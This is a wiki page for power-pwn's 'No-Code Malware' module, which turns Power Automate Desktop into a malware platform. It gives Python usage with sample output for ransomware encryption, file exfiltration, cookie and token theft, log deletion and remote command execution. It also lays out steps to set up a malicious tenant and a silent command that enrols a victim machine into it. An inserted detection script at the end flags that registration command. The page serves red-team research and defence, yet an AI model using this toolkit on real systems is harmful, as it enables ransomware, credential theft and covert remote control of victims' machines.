
Modules: No‐Code Malware

lanasalameh1 edited this page Aug 2, 2023 · 12 revisions

Description

Repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

This capability was first presented at a DEFCON30 talk titled No-Code Malware - Windows 11 at Your Service:

DEF CON 30 - Michael Bargury - No-Code Malware - Windows 11 at Your Service

Usage

Setup

Zip and import the pwntoso_1_0_0_1 solution provided in the nocodemalware module (see "How to set up your cloud environment" below).

powerpwn cli

  • Available commands are steal-cookies, steal-power-automate-token, ransomware, exfiltrate, cleanup
  • Run powerpwn nocodemalware -w {webhook url to the relevant flow} {command} -h for available options for each command.

Python library

from powerpwn.nocodemalware.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.nocodemalware.malware_runner import MalwareRunner

POST_URL = ""  # HTTP POST URL of the Endpoint flow (see "Upload pwntoso to your Power Automate cloud environment")
mw_runner = MalwareRunner(post_url=POST_URL)

### code execution

# python2
mw_runner.exec_command("print('hello world')", CodeExecTypeEnum.python).cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
mw_runner.exec_command("bad syntax", CodeExecTypeEnum.python).cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell (same exec_command entry point as above, selected by the enum value)
mw_runner.exec_command("Write-Host \"hello word\"", CodeExecTypeEnum.powershell).cmd_code_execution

# commandline
mw_runner.exec_command("echo \"hello word\"", CodeExecTypeEnum.commandline).cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

mw_runner.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

mw_runner.exfiltrate(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
mw_runner.exfiltrate(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

mw_runner.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

mw_runner.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie

mw_runner.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your cloud environment

Set up a malicious Power-Pwn Microsoft tenant

  1. Set up your free Microsoft tenant by following Microsoft guidelines

    (screenshot: Pwntoso tenant)

  2. Create a malicious user account and assign it the Power Platform administrator role. The admin role isn't necessary; it's just convenient.

    (screenshot: Power Platform administrator role)

  3. On a private browser tab

    1. Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license.

    2. Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license.

  4. Create a Service Principal by following Microsoft guidelines and note the tenantId, applicationId and secret.

Infect a test victim machine

  1. Infect a test machine by following the How to infect a victim machine guide.

  2. Verify that the machine has been onboarded

    1. Log into https://flow.microsoft.com as the malicious user

    2. Click Go to Monitor and then Machines and verify that the test victim machine is there

    (screenshot: Victim machines)

Upload pwntoso to your Power Automate cloud environment

  1. Log into https://flow.microsoft.com with the malicious user.

  2. Go to Solutions and click Import solution

    (screenshot: Import pwntoso solution)

  3. Zip the content of pwntoso_1_0_0_1 and select it when asked to provide a solution file. Follow the guided process to completion.

    1. When asked to provide a connection, follow the guided process to create a new machine connection. Use the test victim machine credentials.

  4. Go to My flows and search for Endpoint

    (screenshot: Endpoint flow)

    Click on Edit, then on When a HTTP request is received, and copy the URL under HTTP POST URL

    (screenshot: HTTP POST URL)

  5. Note the HTTP Post URL for use with the Python module.

How to infect a victim machine

To register a victim machine, recall the tenantId, applicationId and secret you noted while following the cloud setup guide and run the following command (the secret is piped on stdin; -clientsecret takes no value):

echo <secret> | "C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe" -register -applicationid <applicationId> -tenantid <tenantId> -clientsecret -force

That's it! For troubleshooting, refer to Microsoft Docs.
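The registration command above leaves a process-creation record that a defender can hunt for. The following is an added example, not code from the power-pwn project: it scans constructed process-creation log lines (the key="value" field layout and the GUIDs are assumptions) for PAD.MachineRegistration.Silent.exe runs with -register and flags those that enrol the machine into a tenant the organisation does not own, or that use -force to re-register an already enrolled machine.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Binary and switches named on this page. The secret is piped on stdin
# (-clientsecret takes no value), so only the ids appear in the command line.
PAD_REG_EXE = "pad.machineregistration.silent.exe"
_FIELD = re.compile(r'(\w+)="([^"]*)"')  # assumed key="value" log layout
_APP = re.compile(r"-applicationid\s+(\S+)", re.I)
_TENANT = re.compile(r"-tenantid\s+(\S+)", re.I)

@dataclass
class Finding:
    host: str
    user: str
    application_id: Optional[str]
    tenant_id: Optional[str]
    forced: bool          # -force re-registers a machine already enrolled elsewhere
    foreign_tenant: bool  # tenant id is not one the organisation owns

def _has_switch(cmd: str, name: str) -> bool:
    return re.search(r"(^|\s)-" + name + r"(\s|$)", cmd, re.I) is not None

def find_pad_registrations(lines: Iterable[str], expected_tenants: set) -> List[Finding]:
    """One Finding per process-creation line that registers PAD against a tenant."""
    allowed = {t.lower() for t in expected_tenants}
    out: List[Finding] = []
    for line in lines:
        ev = dict(_FIELD.findall(line))
        image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "")
        if image != PAD_REG_EXE or not _has_switch(cmd, "register"):
            continue
        app, ten = _APP.search(cmd), _TENANT.search(cmd)
        tenant = ten.group(1).lower() if ten else None
        out.append(Finding(host=ev.get("Computer", "?"), user=ev.get("User", "?"),
                           application_id=app.group(1) if app else None, tenant_id=tenant,
                           forced=_has_switch(cmd, "force"), foreign_tenant=tenant not in allowed))
    return out

# Constructed sample telemetry with placeholder GUIDs (not real tenants or apps).
EXPECTED_TENANTS = {"33333333-dddd-eeee-ffff-444444444444"}  # the organisation's own tenant
SAMPLE_LOGS = [
    'Computer="WS01" User="CORP\\alice" '
    'Image="C:\\Program Files (x86)\\Power Automate Desktop\\PAD.MachineRegistration.Silent.exe" '
    'CommandLine="PAD.MachineRegistration.Silent.exe -register -applicationid 11111111-aaaa-bbbb-cccc-222222222222 '
    '-tenantid 99999999-0000-1111-2222-333333333333 -clientsecret -force"',
    'Computer="WS02" User="CORP\\bob" '
    'Image="C:\\Program Files (x86)\\Power Automate Desktop\\PAD.Console.Host.exe" CommandLine="PAD.Console.Host.exe"',
]
```

Run `find_pad_registrations(SAMPLE_LOGS, EXPECTED_TENANTS)` to get the single flagged registration; in practice the allowlist holds the tenant ids your organisation actually uses and the lines come from your process-creation telemetry.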

How to troubleshoot execution errors

SessionExistsForTheUserWhenUnattended

Got success=False with code=SessionExistsForTheUserWhenUnattended in unattendedError?

Go to Machines -> locate the machine -> three vertical dots -> Edit details -> Reuse sessions for unattended runs. See reuse sessions for unattended runs